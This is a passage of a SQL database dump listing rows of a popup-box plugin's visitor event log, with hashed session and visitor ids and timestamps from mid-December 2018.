(38481, 'b508f0bdee211da94ecb9f0a275d2834', '332d3419d504f496', 0, 2, 1, '2018-12-14 06:00:05'),
(38482, '7456be3aef308496cc7edf346f320724', '049dbeed11095c77', 0, 2, 1, '2018-12-14 06:00:34'),
(38483, 'bb4c784d402bdc39f5d03ffeaf9dc97a', '798d56d8d5e68e06', 0, 2, 1, '2018-12-14 06:02:13'),
(38484, '6918999b77536a0703c428a6567ac197', '3a681ce2bd8cc6dd', 0, 2, 1, '2018-12-14 06:02:54'),
(38485, 'b433575d8721772b39a33778426374e9', 'af497c25dcff81bf', 0, 2, 1, '2018-12-14 06:03:33'),
(38486, '4d701975a6f74fd069b6fe4e5a436ce4', '601ff999e03a8543', 0, 2, 1, '2018-12-14 06:03:38'),
(38487, '4d701975a6f74fd069b6fe4e5a436ce4', '601ff999e03a8543', 0, 2, 1, '2018-12-14 06:04:25'),
(38488, '728708282161f0f88e20fc9c3479bdb9', '7b97e0e18deae8e0', 0, 2, 1, '2018-12-14 06:04:29'),
(38489, '5aba054f7f1566085cf6229ca49092e3', '7b445ab85e20f3ad', 0, 2, 1, '2018-12-14 06:04:45'),
(38490, 'b508f0bdee211da94ecb9f0a275d2834', '332d3419d504f496', 0, 2, 1, '2018-12-14 06:04:50'),
(38491, '4cfbdbc422a0b29d04e415dfd55138bc', '8605fcfecc3564f4', 0, 2, 1, '2018-12-14 06:05:52'),
(38492, 'b433575d8721772b39a33778426374e9', 'af497c25dcff81bf', 0, 2, 1, '2018-12-14 06:05:58'),
(38493, '4cfbdbc422a0b29d04e415dfd55138bc', '8605fcfecc3564f4', 0, 2, 1, '2018-12-14 06:06:22'),
(38494, 'a6ce09cb25a49dd38bb9a1befe7ddc56', 'c423a976f7958be7', 0, 2, 1, '2018-12-14 06:08:59'),
(38495, '6918999b77536a0703c428a6567ac197', '3a681ce2bd8cc6dd', 0, 2, 1, '2018-12-14 06:09:33'),
(38496, '6918999b77536a0703c428a6567ac197', '3a681ce2bd8cc6dd', 0, 2, 1, '2018-12-14 06:09:57'),
(38497, 'c86387f24dc70c4e2b48110e813c7b10', '7030f2d754282ace', 0, 2, 1, '2018-12-14 06:11:52'),
(38498, '1566dc3082c912dac5bdf1367b62d770', 'dcadb578720d99b9', 0, 2, 1, '2018-12-14 06:12:04'),
(38499, '9a571656fc0e5ec80cc80c21427f5bee', '68fcde0515352e44', 0, 2, 1, '2018-12-14 06:12:27'),
(38500, '9a571656fc0e5ec80cc80c21427f5bee', '68fcde0515352e44', 0, 2, 1, '2018-12-14 06:12:55'),
(38501, '9a571656fc0e5ec80cc80c21427f5bee', '68fcde0515352e44', 0, 2, 1, '2018-12-14 06:13:04'),
(38502, 'df9043c70e5cc45e6e8cb5ab67b59db0', '44451e386b316e7c', 0, 2, 1, '2018-12-14 06:13:25'),
(38503, '728708282161f0f88e20fc9c3479bdb9', '7b97e0e18deae8e0', 0, 2, 1, '2018-12-14 06:14:12'),
(38504, 'f38e023b507c480101b5b4504deba441', 'ab8367dfea54bd3e', 0, 2, 1, '2018-12-14 06:14:23'),
(38505, 'b6cbd2a5ff4b6aa3ef6b90493979a906', '21a75882f832ae93', 0, 2, 1, '2018-12-14 06:14:41'),
(38506, '16348f6a4aacc2b9bcc54d778fd4fb68', '4bc1bfd1f90e68e5', 0, 2, 1, '2018-12-14 06:15:35'),
(38507, 'c86387f24dc70c4e2b48110e813c7b10', '7030f2d754282ace', 0, 2, 1, '2018-12-14 06:15:46'),
(38508, '16348f6a4aacc2b9bcc54d778fd4fb68', '4bc1bfd1f90e68e5', 0, 2, 1, '2018-12-14 06:15:58'),
(38509, 'c2509bf1ca4f699fe9c32b3f260a23d7', 'b0b809dfb20904a9', 0, 2, 1, '2018-12-14 06:17:15'),
(38510, 'c2509bf1ca4f699fe9c32b3f260a23d7', 'b0b809dfb20904a9', 0, 2, 1, '2018-12-14 06:17:48'),
(38511, 'd9f1a40f1bb997cc22f4de3369ea0b96', '5a08da7046298e7a', 0, 2, 1, '2018-12-14 06:21:18'),
(38512, '2c341de0db1772e143569e98825781f3', '7ec969d351bcf68e', 0, 2, 1, '2018-12-14 06:22:05'),
(38513, '00bdcf18f42acd19e2fbf74e381d21c7', '8cf1f4b8bd4cc593', 0, 2, 1, '2018-12-14 06:22:34'),
(38514, '3a8f7d0d3ba8e4c3ecbaac7af1c35fff', 'd8923e60c6dca0dc', 0, 2, 1, '2018-12-14 06:22:45'),
(38515, 'f38e023b507c480101b5b4504deba441', 'ab8367dfea54bd3e', 0, 2, 1, '2018-12-14 06:25:08'),
(38516, 'd48d3044366d90da30b5774d00e5de57', 'b77ab1eaef144357', 0, 2, 1, '2018-12-14 06:25:53'),
(38517, 'b508f0bdee211da94ecb9f0a275d2834', '332d3419d504f496', 0, 2, 1, '2018-12-14 06:27:56'),
(38518, '2c341de0db1772e143569e98825781f3', '7ec969d351bcf68e', 0, 2, 1, '2018-12-14 06:38:23'),
(38519, 'c1d944477cd6879dc13339173ab760a6', '4c8d57f1ea3e9071', 0, 2, 1, '2018-12-14 06:38:24'),
(38520, '2920a18060da59e741422e23b73aa611', '53f68319b17ad67b', 0, 2, 1, '2018-12-14 06:43:20'),
(38521, '2920a18060da59e741422e23b73aa611', '53f68319b17ad67b', 0, 2, 1, '2018-12-14 06:43:34'),
(38522, 'c94dd8ea386380beb0124bc5068433e6', '38037cb31b3b9fc2', 0, 2, 1, '2018-12-14 06:57:14'),
(38523, '21f3f0ee2b24cbdf93b2c189093906a0', '5a883dd79dd2a20d', 0, 2, 1, '2018-12-14 07:20:41'),
(38524, '1eb978c966304434aeabb9543d72828d', '526b028456f53af3', 0, 2, 1, '2018-12-14 07:23:11'),
(38525, 'f1b37b695b3cba65a431cbd99561acef', '19df97d9486e23d7', 0, 2, 1, '2018-12-14 07:30:29'),
(38526, 'cab3a23bbf9bf70ee045c406d7c89aa2', 'be53f2123a05014f', 0, 2, 1, '2018-12-14 07:32:14'),
(38527, 'cee11cde1b7a3a4edea8d5d1a0d4382e', '1de090ec808c88cc', 0, 2, 1, '2018-12-14 07:59:32'),
(38528, 'b5be0c86941025e24db9e81bb95546ae', '22f43a16a511f701', 0, 2, 1, '2018-12-14 08:30:45'),
(38529, 'b5be0c86941025e24db9e81bb95546ae', '22f43a16a511f701', 0, 2, 1, '2018-12-14 08:31:08'),
(38530, 'e9a5b6fb1317a38bb382005005920dff', 'ef6156a3302fba73', 0, 2, 1, '2018-12-14 08:37:32'),
(38531, 'e9a5b6fb1317a38bb382005005920dff', 'ef6156a3302fba73', 0, 2, 1, '2018-12-14 08:39:16'),
(38532, 'cee11cde1b7a3a4edea8d5d1a0d4382e', '1de090ec808c88cc', 0, 2, 1, '2018-12-14 08:48:09'),
(38533, 'cee11cde1b7a3a4edea8d5d1a0d4382e', '1de090ec808c88cc', 0, 2, 1, '2018-12-14 08:48:56'),
(38534, 'cee11cde1b7a3a4edea8d5d1a0d4382e', '1de090ec808c88cc', 0, 2, 1, '2018-12-14 08:49:23'),
(38535, 'd7229955a5daa1df6cb85975452c4000', 'fe70684cd8e67aca', 0, 2, 1, '2018-12-14 09:18:53'),
(38536, 'c124d5b519a87ea8b07059c3bf8f59f3', 'c69b16a8ac60521f', 0, 2, 1, '2018-12-14 10:18:40'),
(38537, 'da932284b3160afcacb9933cee3809c7', '5369e2ed5f2b66f9', 0, 2, 1, '2018-12-14 10:38:22'),
(38538, 'da932284b3160afcacb9933cee3809c7', '5369e2ed5f2b66f9', 0, 2, 1, '2018-12-14 10:38:46'),
(38539, '936d53d98067549b0bf00f8abde4121e', '21a75882f832ae93', 0, 2, 1, '2018-12-14 10:40:36'),
(38540, '89d90a6cc4e22cb7a700719e0681fef4', '0902ab385ee8a898', 0, 2, 1, '2018-12-14 10:58:27'),
(38541, '8798e8e6a8727ebf449f6a2d1789ab21', 'f6ebbb722fb4d0d0', 0, 2, 1, '2018-12-14 11:04:17'),
(38542, '8798e8e6a8727ebf449f6a2d1789ab21', 'f6ebbb722fb4d0d0', 0, 2, 1, '2018-12-14 11:04:23'),
(38543, '0a42e936345beb89cca6e73dc2a8c8f4', '257e4f544151a962', 0, 2, 1, '2018-12-14 11:26:19'),
(38544, '28b489d418cfdba0b1557b562298ed9d', 'ac75e054644c2908', 0, 2, 1, '2018-12-14 11:34:31'),
(38545, 'e0f18403b8870e92422d8e018233a17b', '51df446c19685386', 0, 2, 1, '2018-12-14 12:14:47'),
(38546, '889bf348c5d3171e328d11fc16e135e6', 'ea5b272cc3c9dd22', 0, 2, 1, '2018-12-14 12:45:20'),
(38547, '6bdc4187c67ae068769c805d64bbd13f', '5d7b802fe86523ca', 0, 2, 1, '2018-12-14 12:45:24'),
(38548, 'af14a26b3f9428b25b44e77206347037', 'c59e9478197b085c', 0, 2, 1, '2018-12-14 12:47:51'),
(38549, '07a075f6acf227392bbe4be0e1f6c8df', '57cd161fd8f008d6', 0, 2, 1, '2018-12-14 12:50:08'),
(38550, 'efcfe5749210156bff3bcc7527bbf721', '2dd44b8748ba0aa9', 0, 2, 1, '2018-12-14 12:52:41'),
(38551, 'e0f18403b8870e92422d8e018233a17b', '51df446c19685386', 0, 2, 1, '2018-12-14 12:57:06'),
(38552, 'e5fd8d36b89b9995ad81f415f26861f7', 'e2c8791634be976d', 0, 2, 1, '2018-12-14 13:02:46');
INSERT INTO `y57u5_rstbox_logs` (`id`, `sessionid`, `visitorid`, `user`, `box`, `event`, `date`) VALUES
(38553, 'e5fd8d36b89b9995ad81f415f26861f7', 'e2c8791634be976d', 0, 2, 1, '2018-12-14 13:12:24'),
(38554, '11ad7e99a93fafd318e9b21491525226', 'f2be47c7b5e54850', 0, 2, 1, '2018-12-14 13:15:03'),
(38555, '649a962fc6c3d22d512684b15e8b8efe', '7c5bcf99f2070582', 0, 2, 1, '2018-12-14 13:53:54'),
(38556, '649a962fc6c3d22d512684b15e8b8efe', '7c5bcf99f2070582', 0, 2, 1, '2018-12-14 13:54:11'),
(38557, '65c1fe318f06c7a6fd0a8346e3dbcc25', '59bb5978882acfd8', 0, 2, 1, '2018-12-14 14:13:40'),
(38558, '2e26ce21233fafd83539dccaabc502d0', '223aac24bc722752', 0, 2, 1, '2018-12-14 14:42:08'),
(38559, '2e26ce21233fafd83539dccaabc502d0', '223aac24bc722752', 0, 2, 1, '2018-12-14 14:42:18'),
(38560, '4fcb38a77a8bff2318725f028642f134', '4a7924dd4418962c', 0, 2, 1, '2018-12-14 14:51:15'),
(38561, '97d006b65298cfd0b01a456d2be7721e', 'd35ca4d563421a7c', 0, 2, 1, '2018-12-14 15:20:03'),
(38562, 'c8cb14ed2adc7bd322a9cd2f96e906e6', 'c6fd10ccde65bc24', 0, 2, 1, '2018-12-14 15:54:25'),
(38563, '6ed47e6881fe31a6e328960e39ff932f', 'fed10d1e71fcaaeb', 0, 2, 1, '2018-12-14 15:54:31'),
(38564, '6ed47e6881fe31a6e328960e39ff932f', 'fed10d1e71fcaaeb', 0, 2, 1, '2018-12-14 15:54:34'),
(38565, '83f27dc5f9a8a604c32c77634cf76f60', 'b3030e34c142dca1', 0, 2, 1, '2018-12-14 16:11:59'),
(38566, '28dd53d33c60c1baad52cf74697580db', 'c660ad7e3a4c4e20', 0, 2, 1, '2018-12-14 16:29:56'),
(38567, 'd96eafeeef14a5aa8b96d108963c4653', '5a3444386fefde4b', 0, 2, 1, '2018-12-14 16:41:03'),
(38568, '83f27dc5f9a8a604c32c77634cf76f60', 'b3030e34c142dca1', 0, 2, 1, '2018-12-14 17:07:38'),
(38569, '83f27dc5f9a8a604c32c77634cf76f60', 'b3030e34c142dca1', 0, 2, 1, '2018-12-14 17:07:42'),
(38570, 'f4eedd8d4196ccad5d9cbdf6bbac4605', '726aa735bc53b98e', 0, 2, 1, '2018-12-14 18:04:03'),
(38571, '0cbac80e38d4ed2303c6fd48bc35e4ac', '3233431a244017cd', 0, 2, 1, '2018-12-14 18:22:08'),
(38572, '955a15d710101b0714a7dbff38be2ec7', '63f151b560b07118', 0, 2, 1, '2018-12-14 20:14:04'),
(38573, '955a15d710101b0714a7dbff38be2ec7', '63f151b560b07118', 0, 2, 1, '2018-12-14 20:15:07'),
(38574, '955a15d710101b0714a7dbff38be2ec7', '63f151b560b07118', 0, 2, 1, '2018-12-14 20:17:14'),
(38575, '955a15d710101b0714a7dbff38be2ec7', '63f151b560b07118', 0, 2, 1, '2018-12-14 20:18:30'),
(38576, '9b0f6a594907d8408aab9be48cef12ab', 'a817f82967ba5bfa', 0, 2, 1, '2018-12-14 20:39:09'),
(38577, '9b0f6a594907d8408aab9be48cef12ab', 'a817f82967ba5bfa', 0, 2, 1, '2018-12-14 20:39:18'),
(38578, '9b0f6a594907d8408aab9be48cef12ab', 'a817f82967ba5bfa', 0, 2, 1, '2018-12-14 20:39:27'),
(38579, '7c235677abbd96cfd8646327385969a4', 'c0d620ee8725a926', 0, 2, 1, '2018-12-14 20:42:23'),
(38580, '90fe24cb3f09ed55ca761afcff695e3b', 'b5e681033727a648', 0, 2, 1, '2018-12-14 20:56:08'),
(38581, 'b3f8d6706e4cb5bfedda2f5b63fdf700', 'c64598d61a54b488', 0, 2, 1, '2018-12-14 21:19:14'),
(38582, 'c17bcc29aed07965994f275563f0b290', '9c3769a4f312cf34', 0, 2, 1, '2018-12-14 22:47:47'),
(38583, '60d47b9391077fddfa914ff6c3a6d12f', '96fdf4df356c8157', 0, 2, 1, '2018-12-14 22:52:40'),
(38584, 'c17bcc29aed07965994f275563f0b290', '9c3769a4f312cf34', 0, 2, 1, '2018-12-14 22:54:38'),
(38585, '5fd468e809087e8f56ef98a6e77df6e0', 'e1f312dd1843e45a', 0, 2, 1, '2018-12-14 23:02:33'),
(38586, 'c4c8a8c2d1fa0e29c5326276e8191842', 'baa8d16c1a4e5230', 0, 2, 1, '2018-12-15 00:01:12'),
(38587, '55ac61e55241c4ae222a90fcce8c9266', 'c09d6bc6cac8122d', 0, 2, 1, '2018-12-15 00:54:06'),
(38588, 'fa03927e8666aec1130728a7be7b7700', '0dd64b5c16dd65c1', 0, 2, 1, '2018-12-15 02:19:35'),
(38589, 'fa03927e8666aec1130728a7be7b7700', '0dd64b5c16dd65c1', 0, 2, 1, '2018-12-15 02:20:16'),
(38590, 'fa03927e8666aec1130728a7be7b7700', '0dd64b5c16dd65c1', 0, 2, 1, '2018-12-15 02:21:03'),
(38591, '708abc30128b0cc206c204ba988cc06a', '5c14fc42e96ba710', 0, 2, 1, '2018-12-15 03:42:00'),
(38592, '020450cb6ed5a3bf7fe843eb31d05cb9', '1a4c650c0f63e8bc', 0, 2, 1, '2018-12-15 04:04:21'),
(38593, '79fb13e4f04a81289d5bbce1074c3380', '21f5d356a659133c', 0, 2, 1, '2018-12-15 04:51:33'),
(38594, '79fb13e4f04a81289d5bbce1074c3380', '21f5d356a659133c', 0, 2, 1, '2018-12-15 04:51:43'),
(38595, '515c4346f16c52cc3ce083beec7e683e', '503a514a8daa32a7', 0, 2, 1, '2018-12-15 04:55:14'),
(38596, '515c4346f16c52cc3ce083beec7e683e', '503a514a8daa32a7', 0, 2, 1, '2018-12-15 04:56:07'),
(38597, '698557d9ec631e38952ba5db68eb5850', 'ddcd269428326cc0', 0, 2, 1, '2018-12-15 04:58:17'),
(38598, 'edf8edfb76e84a4ae119d7016f7a6e34', '65fb1a08fe2b5aab', 0, 2, 1, '2018-12-15 04:58:19'),
(38599, 'f9d0c34115efabe1626add0f3712749d', '544792a504897a83', 0, 2, 1, '2018-12-15 04:58:23'),
(38600, '10724ce3ab776175a6bd3f4aae7ac049', 'f19010d8a5f137d0', 0, 2, 1, '2018-12-15 04:58:49'),
(38601, '1b761b6091280268ef65558b3b11a47c', 'f7fef20839e7b60f', 0, 2, 1, '2018-12-15 04:59:00'),
(38602, '101df94cb82c0661dd46aa92d98aaeb1', '3de88ff4581dab27', 0, 2, 1, '2018-12-15 05:00:07'),
(38603, '101df94cb82c0661dd46aa92d98aaeb1', '3de88ff4581dab27', 0, 2, 1, '2018-12-15 05:00:15'),
(38604, '101df94cb82c0661dd46aa92d98aaeb1', '3de88ff4581dab27', 0, 2, 1, '2018-12-15 05:00:22'),
(38605, '08d8ed25838d6451fdbd8e301a5349ef', '0c844fefc01db064', 0, 2, 1, '2018-12-15 05:00:29'),
(38606, '08d8ed25838d6451fdbd8e301a5349ef', '0c844fefc01db064', 0, 2, 1, '2018-12-15 05:00:49'),
(38607, '08d8ed25838d6451fdbd8e301a5349ef', '0c844fefc01db064', 0, 2, 1, '2018-12-15 05:01:04'),
(38608, '698557d9ec631e38952ba5db68eb5850', 'ddcd269428326cc0', 0, 2, 1, '2018-12-15 05:01:04'),
(38609, '08d8ed25838d6451fdbd8e301a5349ef', '0c844fefc01db064', 0, 2, 1, '2018-12-15 05:01:24'),
(38610, 'cedb8e487617df6d11edb42469e85d58', 'ee048a80ed202af2', 0, 2, 1, '2018-12-15 05:01:32'),
(38611, 'edf8edfb76e84a4ae119d7016f7a6e34', '65fb1a08fe2b5aab', 0, 2, 1, '2018-12-15 05:01:32'),
(38612, 'cedb8e487617df6d11edb42469e85d58', 'ee048a80ed202af2', 0, 2, 1, '2018-12-15 05:01:43'),
(38613, 'dbbce67386f4860c6d3f6cba0e862e07', '553b9f0a18b97af8', 0, 2, 1, '2018-12-15 05:02:17'),
(38614, '698557d9ec631e38952ba5db68eb5850', 'ddcd269428326cc0', 0, 2, 1, '2018-12-15 05:02:36'),
(38615, '698557d9ec631e38952ba5db68eb5850', 'ddcd269428326cc0', 0, 2, 1, '2018-12-15 05:03:05'),
(38616, 'df38b3b75f857da0c72c5a5691960ec9', 'b512fd170584454c', 0, 2, 1, '2018-12-15 05:04:39'),
(38617, 'f182830197e0995a8ac966c16f069282', 'df27b9a2919a8206', 0, 2, 1, '2018-12-15 05:04:44'),
(38618, 'f182830197e0995a8ac966c16f069282', 'df27b9a2919a8206', 0, 2, 1, '2018-12-15 05:05:12'),
(38619, '5d0e0d472bad6cab6d0d76cf027b79a7', '33c0af73ba240498', 0, 2, 1, '2018-12-15 05:05:37'),
(38620, '4965fdc24d347c1a2eb828e6317e0ded', '65e1b73cf3be5c3f', 0, 2, 1, '2018-12-15 05:05:39'),
(38621, '37f0675e8d7575a3b453656c2e13a7bd', '553b9f0a18b97af8', 0, 2, 1, '2018-12-15 05:06:21'),
(38622, '2cedfd4a1ff42e8a346e33f73204df58', '6092d6c1cb041b23', 0, 2, 1, '2018-12-15 05:06:29'),
(38623, 'ea271e3815d503ae70a77a8e4c4b7e1f', '4765b5e8fd392dd4', 0, 2, 1, '2018-12-15 05:06:46'),
(38624, '9e21d59feb370b9c1bfab57deef0174e', '89872404186e372a', 0, 2, 1, '2018-12-15 05:07:07'),
(38625, 'f09fc4397e5feae5ca75054aa4953ba4', '8e5b43ff6ea202a4', 0, 2, 1, '2018-12-15 05:07:32'),
(38626, '8fdb618289f4c2f7489c015a81212683', '38037cb31b3b9fc2', 0, 2, 1, '2018-12-15 05:08:17'),
(38627, '698557d9ec631e38952ba5db68eb5850', 'ddcd269428326cc0', 0, 2, 1, '2018-12-15 05:08:18'),
(38628, 'cedb8e487617df6d11edb42469e85d58', 'ee048a80ed202af2', 0, 2, 1, '2018-12-15 05:08:26'),
(38629, '3429f6eb265ff386cfc01f3a9632d22a', 'd55ac0b136bed2ae', 0, 2, 1, '2018-12-15 05:08:32'),
(38630, '0a327eadd4e8616109029854114777e5', '74aba437eea39f30', 0, 2, 1, '2018-12-15 05:10:07'),
(38631, 'b1dc547e6afa812750d49fc16402fcf3', 'dcadb578720d99b9', 0, 2, 1, '2018-12-15 05:10:48'),
(38632, 'a3b19f34b927311ca925460f1921f72d', 'c40cb1cc5eb13bc9', 0, 2, 1, '2018-12-15 05:12:00'),
(38633, 'e2ab04ad276db5883a62898e71bd385d', 'd38fc111c48d1e69', 0, 2, 1, '2018-12-15 05:12:10'),
(38634, '22631a1eb06371f3392914b6b0bf5ff4', 'fc794f0a80972404', 0, 2, 1, '2018-12-15 05:12:37'),
(38635, 'c3c85fb2f4fe8fc3948fb018b8d77b1c', 'a06df92c3e268263', 0, 2, 1, '2018-12-15 05:12:41'),
(38636, '26cfa27ff4c6634839dab30bb94d745c', '1ec75219d7482e28', 0, 2, 1, '2018-12-15 05:13:50'),
(38637, 'a3bcffbffdf53b28757ad8e91a67949f', '3fdb63a2b57cd09e', 0, 2, 1, '2018-12-15 05:15:00'),
(38638, '2ad9a64e28e4a6f32bd3aa5caf0fb14a', 'a0d4b2aefae6f54b', 0, 2, 1, '2018-12-15 05:15:15'),
(38639, '5fd7ab46b8cb1ba80e3eadc129542346', '85fbf6551e3e1a54', 0, 2, 1, '2018-12-15 05:15:25'),
(38640, '2ad9a64e28e4a6f32bd3aa5caf0fb14a', 'a0d4b2aefae6f54b', 0, 2, 1, '2018-12-15 05:16:10'),
(38641, '37f0675e8d7575a3b453656c2e13a7bd', '553b9f0a18b97af8', 0, 2, 1, '2018-12-15 05:16:18'),
(38642, '4a565a86ed5250346d9972a704753b1b', 'f1cc8d7ba1afc906', 0, 2, 1, '2018-12-15 05:16:20'),
(38643, 'b595350a2fbe354d92f09cec4563ee8c', 'dcadb578720d99b9', 0, 2, 1, '2018-12-15 05:16:22'),
(38644, '4a565a86ed5250346d9972a704753b1b', 'f1cc8d7ba1afc906', 0, 2, 1, '2018-12-15 05:16:37'),
(38645, '5fb998756eb3a3d1560b5d926d3898eb', '02829647d6d6d42d', 0, 2, 1, '2018-12-15 05:18:04'),
(38646, '5fb998756eb3a3d1560b5d926d3898eb', '02829647d6d6d42d', 0, 2, 1, '2018-12-15 05:18:19'),
(38647, '559c6689331904c7a3fe3c1d7811ddcb', '65e1b73cf3be5c3f', 0, 2, 1, '2018-12-15 05:18:26'),
(38648, 'a56f0575e4c8046e46be90922661081d', 'f85de81f8eb472cb', 0, 2, 1, '2018-12-15 05:18:48'),
(38649, 'b2d204d50e3d8a3137810892ed721504', 'c962ab3e75718885', 0, 2, 1, '2018-12-15 05:18:51'),
(38650, 'edf8edfb76e84a4ae119d7016f7a6e34', '65fb1a08fe2b5aab', 0, 2, 1, '2018-12-15 05:19:31'),
(38651, 'a56f0575e4c8046e46be90922661081d', 'f85de81f8eb472cb', 0, 2, 1, '2018-12-15 05:19:39'),
(38652, '84279fd093c96fd626e74f0064b032c9', 'c0d620ee8725a926', 0, 2, 1, '2018-12-15 05:19:48'),
(38653, 'cebebd5f7a8703a2680f88b70ce7dfa1', '9fa71c818742c95f', 0, 2, 1, '2018-12-15 05:21:12'),
(38654, 'f9d0c34115efabe1626add0f3712749d', '544792a504897a83', 0, 2, 1, '2018-12-15 05:21:34'),
(38655, 'ae0b4b8a295702431f004173428f1fe0', 'c2a9c7ebb7169f9c', 0, 2, 1, '2018-12-15 05:22:58'),
(38656, 'da1982b76378e1e4c6dbdb5efd4b94bf', 'b800ba4fd7a89f76', 0, 2, 1, '2018-12-15 05:23:00'),
(38657, 'b2d204d50e3d8a3137810892ed721504', 'c962ab3e75718885', 0, 2, 1, '2018-12-15 05:23:20'),
(38658, '61e48670e8cc79e29427f42ce4aa5415', 'ee15d3d6defea2e0', 0, 2, 1, '2018-12-15 05:23:27'),
(38659, '7923aa4cd43098096afdba70f2f329ea', '1fe68226bb896748', 0, 2, 1, '2018-12-15 05:24:22'),
(38660, '6e86df8ea13050e7352b96214b4096be', 'a7d8e805f0261714', 0, 2, 1, '2018-12-15 05:24:34'),
(38661, 'ae0b4b8a295702431f004173428f1fe0', 'c2a9c7ebb7169f9c', 0, 2, 1, '2018-12-15 05:24:45'),
(38662, 'b08a6b9b7b44bf52199ccc08a569accb', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2018-12-15 05:26:02'),
(38663, 'b08a6b9b7b44bf52199ccc08a569accb', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2018-12-15 05:26:10'),
(38664, '05ae76e52e5c523850b16a34e041a536', '1b5e475496daa72c', 0, 2, 1, '2018-12-15 05:26:12'),
(38665, 'c2509bf1ca4f699fe9c32b3f260a23d7', 'b0b809dfb20904a9', 0, 2, 1, '2018-12-15 05:26:16'),
(38666, 'c2509bf1ca4f699fe9c32b3f260a23d7', 'b0b809dfb20904a9', 0, 2, 1, '2018-12-15 05:26:25'),
(38667, '61e48670e8cc79e29427f42ce4aa5415', 'ee15d3d6defea2e0', 0, 2, 1, '2018-12-15 05:26:42'),
(38668, 'ae0b4b8a295702431f004173428f1fe0', 'c2a9c7ebb7169f9c', 0, 2, 1, '2018-12-15 05:26:46'),
(38669, '06b7f19889cd0d0a0c6cd0c2df8a4367', '65e15ddccfc78921', 0, 2, 1, '2018-12-15 05:27:16'),
(38670, '5a84aeaab5d47e44369fed4d35cf2e3f', '46713cac27a94b83', 0, 2, 1, '2018-12-15 05:28:26'),
(38671, '2d47901a66ac650a45f6f75ccc9f7eb9', '69e4afaed27697db', 0, 2, 1, '2018-12-15 05:28:29'),
(38672, '5a84aeaab5d47e44369fed4d35cf2e3f', '46713cac27a94b83', 0, 2, 1, '2018-12-15 05:28:37'),
(38673, 'ae0b4b8a295702431f004173428f1fe0', 'c2a9c7ebb7169f9c', 0, 2, 1, '2018-12-15 05:28:42'),
(38674, '2d47901a66ac650a45f6f75ccc9f7eb9', '69e4afaed27697db', 0, 2, 1, '2018-12-15 05:29:12'),
(38675, 'e4a3835af7938a34a63d06b4cbcb90c7', '5a661d764bd49028', 0, 2, 1, '2018-12-15 05:29:21'),
(38676, '7444e5663bea1758328fcfc8e5f94cf5', 'd67839a385270e7b', 0, 2, 1, '2018-12-15 05:30:02'),
(38677, '7444e5663bea1758328fcfc8e5f94cf5', 'd67839a385270e7b', 0, 2, 1, '2018-12-15 05:30:39'),
(38678, 'f9d0c34115efabe1626add0f3712749d', '544792a504897a83', 0, 2, 1, '2018-12-15 05:32:25'),
(38679, '2e01a8e4bd2a5669e30c40d2ba92b0d4', 'cd93a325f777ebe6', 0, 2, 1, '2018-12-15 05:32:53'),
(38680, '2e01a8e4bd2a5669e30c40d2ba92b0d4', 'cd93a325f777ebe6', 0, 2, 1, '2018-12-15 05:33:22'),
(38681, '2e01a8e4bd2a5669e30c40d2ba92b0d4', 'cd93a325f777ebe6', 0, 2, 1, '2018-12-15 05:33:45'),
(38682, '15af4003e27abef722b3d89aed69d915', '65e1b73cf3be5c3f', 0, 2, 1, '2018-12-15 05:35:14'),
(38683, 'c3c85fb2f4fe8fc3948fb018b8d77b1c', 'a06df92c3e268263', 0, 2, 1, '2018-12-15 05:36:03'),
(38684, '22631a1eb06371f3392914b6b0bf5ff4', 'fc794f0a80972404', 0, 2, 1, '2018-12-15 05:36:24'),
(38685, '2e01a8e4bd2a5669e30c40d2ba92b0d4', 'cd93a325f777ebe6', 0, 2, 1, '2018-12-15 05:37:05'),
(38686, 'da1982b76378e1e4c6dbdb5efd4b94bf', 'b800ba4fd7a89f76', 0, 2, 1, '2018-12-15 05:37:17'),
(38687, 'b2d204d50e3d8a3137810892ed721504', 'c962ab3e75718885', 0, 2, 1, '2018-12-15 05:37:27'),
(38688, '2e01a8e4bd2a5669e30c40d2ba92b0d4', 'cd93a325f777ebe6', 0, 2, 1, '2018-12-15 05:38:34'),
(38689, '48385bd406af27529a4838ccaf565716', '7501b42c35accff7', 0, 2, 1, '2018-12-15 05:38:49'),
(38690, '2e01a8e4bd2a5669e30c40d2ba92b0d4', 'cd93a325f777ebe6', 0, 2, 1, '2018-12-15 05:38:57'),
(38691, 'ac820a757279be7794ebb5b15351e957', '76ed9cbc7a5d0626', 0, 2, 1, '2018-12-15 05:39:00'),
(38692, 'a7b09e396ee35acbb1dcc914303bdeed', '61eefb57e6c49666', 0, 2, 1, '2018-12-15 05:40:27'),
(38693, 'ae0b4b8a295702431f004173428f1fe0', 'c2a9c7ebb7169f9c', 0, 2, 1, '2018-12-15 05:41:49'),
(38694, '841b87df2a36142ce293c64d58a70e97', 'c6e97f17cebc7ba8', 0, 2, 1, '2018-12-15 05:42:31'),
(38695, '153b6b0ce22ec4f8110dd434ed048e8a', 'f556605047b35dd8', 0, 2, 1, '2018-12-15 05:42:34'),
(38696, '1be0ae3b75c94ffb73b187a82e079817', '3b4446abb707e8c0', 0, 2, 1, '2018-12-15 05:43:02'),
(38697, '35bb9c182e04e8b4899df7817aaf3e40', '62d3627a2e72cb15', 0, 2, 1, '2018-12-15 05:43:14'),
(38698, '841b87df2a36142ce293c64d58a70e97', 'c6e97f17cebc7ba8', 0, 2, 1, '2018-12-15 05:43:36'),
(38699, '1be0ae3b75c94ffb73b187a82e079817', '3b4446abb707e8c0', 0, 2, 1, '2018-12-15 05:44:07'),
(38700, 'b3578ae0cc31f182cffb6a6115a1305c', '618a8dda34a6c476', 0, 2, 1, '2018-12-15 05:44:40'),
(38701, 'eba63e283f9abbb72bb291a59f060464', '544792a504897a83', 0, 2, 1, '2018-12-15 05:46:46'),
(38702, 'bc847c917c58bbb2b6112eb6b385d336', 'b5aa5bf58fedb8e0', 0, 2, 1, '2018-12-15 05:47:46'),
(38703, 'bc847c917c58bbb2b6112eb6b385d336', 'b5aa5bf58fedb8e0', 0, 2, 1, '2018-12-15 05:48:12'),
(38704, 'd91f592ebb7579fc2175c34de610c97e', 'fbf0576065758144', 0, 2, 1, '2018-12-15 05:48:15'),
(38705, '366ff8d36c1ee6cb1f69b0c1e032d950', '8ad007cf09224cd8', 0, 2, 1, '2018-12-15 05:49:08'),
(38706, '0cbac80e38d4ed2303c6fd48bc35e4ac', '3233431a244017cd', 0, 2, 1, '2018-12-15 05:50:01'),
(38707, 'bd0f17ba3da3b2c996d16fecb52ec57a', '65e15ddccfc78921', 0, 2, 1, '2018-12-15 05:50:03'),
